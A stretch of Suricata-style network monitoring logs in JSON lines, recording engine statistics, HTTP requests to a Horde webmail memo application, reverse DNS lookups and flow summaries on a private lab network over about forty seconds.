{"timestamp":"2020-02-29T00:18:14.000266+0000","event_type":"stats","stats":{"uptime":14746,"capture":{"kernel_packets":136484,"kernel_drops":0},"decoder":{"pkts":136500,"bytes":93793921,"invalid":192,"ipv4":134969,"ipv6":10,"ethernet":136500,"raw":0,"null":0,"sll":0,"tcp":129542,"udp":5220,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2809,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2825,"synack":2816,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1846,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2389,"failed_udp":112},"tx":{"http":4715,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2469}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2445,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65529,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":140340,"memcap":0}}} {"timestamp":"2020-02-29T00:18:15.965065+0000","flow_id":1132834899264066,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34872,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4935},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":21692,"tx_id":0}} {"timestamp":"2020-02-29T00:18:16.581122+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5780},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":31043,"tx_id":2}} {"timestamp":"2020-02-29T00:18:17.555596+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55199,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15870,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:17.664296+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55199,"proto":"UDP","dns":{"type":"answer","id":15870,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:17.664296+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55199,"proto":"UDP","dns":{"type":"answer","id":15870,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:17.680210+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:18:17.680210+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:18:19.000354+0000","flow_id":36278189856155,"event_type":"flow","src_ip":"192.168.10.122","src_port":46056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:18.890267+0000","end":"2020-02-29T00:13:18.998610+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:21.000202+0000","event_type":"stats","stats":{"uptime":14753,"capture":{"kernel_packets":136513,"kernel_drops":0},"decoder":{"pkts":136519,"bytes":93796452,"invalid":192,"ipv4":134988,"ipv6":10,"ethernet":136519,"raw":0,"null":0,"sll":0,"tcp":129559,"udp":5222,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093888},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2390,"failed_udp":112},"tx":{"http":4716,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2470}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2446,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19180,"memcap_state":0,"memcap_global":0},"http":{"memuse":41096,"memcap":0}}} {"timestamp":"2020-02-29T00:18:22.059601+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34874,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:18:22.074132+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46811,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:22.182286+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36137,"proto":"UDP","dns":{"type":"answer","id":46811,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:22.182286+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36137,"proto":"UDP","dns":{"type":"answer","id":46811,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:22.245963+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:18:22.245963+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":215,"tx_id":1}} {"timestamp":"2020-02-29T00:18:22.255851+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18162,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:22.365114+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59659,"proto":"UDP","dns":{"type":"answer","id":18162,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:22.365114+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59659,"proto":"UDP","dns":{"type":"answer","id":18162,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:22.471951+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5341}} {"timestamp":"2020-02-29T00:18:25.000682+0000","flow_id":780334029631261,"event_type":"flow","src_ip":"192.168.10.122","src_port":36750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:24.749341+0000","end":"2020-02-29T00:13:24.857976+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:27.000505+0000","flow_id":607027817694435,"event_type":"flow","src_ip":"192.168.10.130","src_port":34862,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":25,"bytes_toserver":2523,"bytes_toclient":23669,"start":"2020-02-29T00:16:49.869603+0000","end":"2020-02-29T00:17:26.378585+0000","age":37,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:27.477985+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34874,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5341},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":25658,"tx_id":2}} {"timestamp":"2020-02-29T00:18:28.000172+0000","event_type":"stats","stats":{"uptime":14760,"capture":{"kernel_packets":136522,"kernel_drops":0},"decoder":{"pkts":136536,"bytes":93805419,"invalid":192,"ipv4":135005,"ipv6":10,"ethernet":136536,"raw":0,"null":0,"sll":0,"tcp":129572,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2447,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19511,"memcap_state":0,"memcap_global":0},"http":{"memuse":35606,"memcap":0}}} {"timestamp":"2020-02-29T00:18:29.000745+0000","flow_id":2225289892430090,"event_type":"flow","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":16,"bytes_toserver":2090,"bytes_toclient":15483,"start":"2020-02-29T00:17:19.098570+0000","end":"2020-02-29T00:17:28.722052+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:32.000589+0000","flow_id":1353815243338707,"event_type":"flow","src_ip":"192.168.10.122","src_port":42553,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:31.570323+0000","end":"2020-02-29T00:13:31.678579+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:32.000791+0000","flow_id":400710460705573,"event_type":"flow","src_ip":"192.168.10.122","src_port":45826,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:31.396069+0000","end":"2020-02-29T00:13:31.504125+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:33.000326+0000","flow_id":1579541559988013,"event_type":"flow","src_ip":"192.168.10.130","src_port":34866,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":12,"bytes_toserver":1099,"bytes_toclient":9575,"start":"2020-02-29T00:17:27.151341+0000","end":"2020-02-29T00:17:32.580593+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:35.000167+0000","event_type":"stats","stats":{"uptime":14767,"capture":{"kernel_packets":136534,"kernel_drops":0},"decoder":{"pkts":136538,"bytes":93805551,"invalid":192,"ipv4":135007,"ipv6":10,"ethernet":136538,"raw":0,"null":0,"sll":0,"tcp":129574,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2793,"new_pruned":17,"est_pruned":2450,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":35526,"memcap":0}}} {"timestamp":"2020-02-29T00:18:42.000226+0000","event_type":"stats","stats":{"uptime":14774,"capture":{"kernel_packets":136534,"kernel_drops":0},"decoder":{"pkts":136538,"bytes":93805551,"invalid":192,"ipv4":135007,"ipv6":10,"ethernet":136538,"raw":0,"null":0,"sll":0,"tcp":129574,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2450,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":35526,"memcap":0}}} {"timestamp":"2020-02-29T00:18:43.889571+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49631,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15827,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:43.998032+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49631,"proto":"UDP","dns":{"type":"answer","id":15827,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:43.998032+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49631,"proto":"UDP","dns":{"type":"answer","id":15827,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:44.564099+0000","flow_id":1980751639961820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202}} {"timestamp":"2020-02-29T00:18:47.000298+0000","flow_id":302931236246879,"event_type":"flow","src_ip":"192.168.10.122","src_port":36289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:46.283999+0000","end":"2020-02-29T00:13:46.392737+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:49.000216+0000","event_type":"stats","stats":{"uptime":14781,"capture":{"kernel_packets":136545,"kernel_drops":0},"decoder":{"pkts":136557,"bytes":93815974,"invalid":192,"ipv4":135026,"ipv6":10,"ethernet":136557,"raw":0,"null":0,"sll":0,"tcp":129591,"udp":5228,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2811,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2827,"synack":2818,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1848,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2393,"failed_udp":112},"tx":{"http":4719,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2473}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2451,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":121149,"memcap":0}}} {"timestamp":"2020-02-29T00:18:49.566853+0000","flow_id":1980751639961820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52774,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":48903,"tx_id":0}} {"timestamp":"2020-02-29T00:18:51.102531+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52667,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31596,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:51.207491+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52667,"proto":"UDP","dns":{"type":"answer","id":31596,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 